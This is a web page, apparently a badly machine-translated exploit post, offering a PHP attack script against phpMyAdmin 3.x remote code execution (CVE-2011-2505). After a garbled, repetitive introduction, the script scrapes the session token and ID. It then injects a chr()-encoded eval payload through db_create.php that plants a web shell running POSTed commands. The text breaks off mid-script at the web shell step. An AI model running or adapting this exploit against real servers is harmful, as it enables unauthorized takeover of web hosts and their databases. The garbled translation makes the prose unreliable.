PhpMyAdmin3.X Remote Code Execution Vulnerability 0day

PhpMyAdmin3.X Remote Code Execution Vulnerability exploit in php. Old webmaster from t00sl. In fact, EXP exists in the previous section. I heard that the chicken ribs are very good, so I didn't pay attention to them at the time. It is difficult to find the phpMyAdmin directory in these years. 3. A few versions are also used. However, after research by the cool guys, we can say that this 0-day is actually not

PhpMyAdmin3.X Remote Code Execution Vulnerability php versionExPloit. Old webmaster from t00sl.

In fact, EXP exists in the previous section. I heard that the chicken ribs are very good, so I didn't pay attention to them at the time. Talking about this

It is difficult to find the phpMyAdmin directory. 3. A few versions are also used. However

After the study, I said that this 0-day is not a problem. Khan ~~~ It's just me. Got it

Written by Lao Jun DanielPHPVersion EXP.

#!/usr/bin/php cute exploit [Not jilei(chicken\'s ribs)]by oldjun(www.oldjun.com)welcome to www.t00ls.netmail: oldjun@gmail.comAssigned CVE id: CVE-2011-2505+---------------------------------------------------------------------------+\'); /** * working when the directory:"config" exists and is writeable.**/ if ($argc < 3) { print_r(\'+---------------------------------------------------------------------------+Usage: php \'.$argv[0].\' host pathhost: target server (ip/hostname)path: path to pma3Example:php \'.$argv[0].\' localhost /pma/+---------------------------------------------------------------------------+\'); exit;} $host = $argv[1];$path = $argv[2]; /** * Try to determine if the directory:"config" exists**/echo "[+] Try to determine if the directory:config exists....n";$returnstr=php_request(\'config/\');if(strpos($returnstr,\'404\')){ exit("[-] Exploit Failed! The directory:config do not exists!n");} /** * Try to get token and sessionid**/echo "[+] Try to get token and sessionid....n";$result=php_request(\'index.php\');preg_match(\'/phpMyAdmin=(w{32,40});(.*?)token=(w{32})&/s\', $result, $resp);$token=$resp[3];$sessionid=$resp[1];if($token && $sessionid){ echo "[+] token:$tokenn"; echo "[+] Session ID:$sessionidn";}else{ exit("[-] Can\'t get token and Session ID,Exploit Failed!n");} /** * Try to insert shell into session**/echo "[+] Try to insert shell into session....n";php_request(\'db_create.php?token=\'.$token.\'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net\',\'\',\'phpMyAdmin=\'.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here. /** * Try to create webshell